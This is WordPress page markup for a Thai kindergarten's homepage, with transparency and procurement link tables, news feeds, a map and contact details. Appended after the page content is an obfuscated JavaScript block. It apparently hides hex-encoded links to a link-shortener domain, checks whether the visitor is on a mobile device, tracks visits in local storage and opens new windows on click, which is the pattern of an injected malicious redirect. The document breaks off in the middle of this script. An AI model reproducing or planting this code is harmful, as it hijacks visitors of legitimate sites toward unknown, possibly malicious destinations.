800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const 